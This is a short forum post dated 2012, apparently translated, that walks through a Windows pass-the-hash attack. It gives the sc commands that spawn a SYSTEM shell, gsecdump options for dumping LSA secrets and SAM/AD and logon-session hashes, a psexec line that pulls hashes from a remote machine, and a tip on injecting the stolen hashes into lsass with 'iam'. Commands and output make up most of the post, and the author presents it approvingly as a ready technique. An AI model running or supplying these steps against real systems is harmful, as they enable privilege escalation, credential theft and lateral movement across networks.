Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which is how the hash injection attack is carried out. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes picked up during ARP spoofing, and the ones obtained with gethash, actually never need the password to be cracked at all; it is purely a matter of using the tool. As the original puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.